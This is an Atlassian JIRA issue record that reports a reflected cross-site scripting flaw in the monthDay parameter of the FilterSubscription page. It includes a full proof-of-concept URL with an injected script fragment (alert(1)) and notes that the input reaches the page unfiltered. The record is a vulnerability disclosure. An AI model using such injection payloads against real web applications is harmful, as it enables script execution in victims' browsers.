XSS in filter.subscription.prefix.monthDay parameter of /secure/FilterSubscription.jspa

2010-11-05T05:10:14
ID ATLASSIAN:JRA-22957
Type atlassian
Reporter awang@atlassian.com
Modified 2017-02-17T06:18:36

Description

http://172.16.230.130:8080/secure/FilterSubscription.jspa?filter.subscription.prefix.interval=180&groupName=jira-users&filter.subscription.prefix.runFromMins=00&nextRun=&filter.subscription.prefix.runToMins=00&filter.subscription.prefix.runToMeridian=pm&filter.subscription.prefix.week=2&filter.subscription.prefix.runOnceMeridian=pm&filter.subscription.prefix.day=2&filter.subscription.prefix.runOnceMins=5&filter.subscription.prefix.runFromMeridian=pm&filter.subscription.prefix.monthDay=1"%3balert(1)//b&subId=&atl_token=b1719c444f52dc051d1d99a5a0cc8d5b8690a864&filter.subscription.prefix.runToHours=2&lastRun=&filter.subscription.prefix.cronString=555-555-0199@example.com&Subscriure=Subscriure&filter.subscription.prefix.runOnceHours=2&filter.subscription.prefix.runFromHours=2&filterId=10000&filter.subscription.prefix.daysOfMonthOpt=dayOfWeekOfMonth&emailOnEmpty=on&filter.subscription.prefix.dailyWeeklyMonthly=daysOfWeek

filter.subscription.prefix.monthDay contents are passed unfiltered to the resulting page, found by scanning and verified manually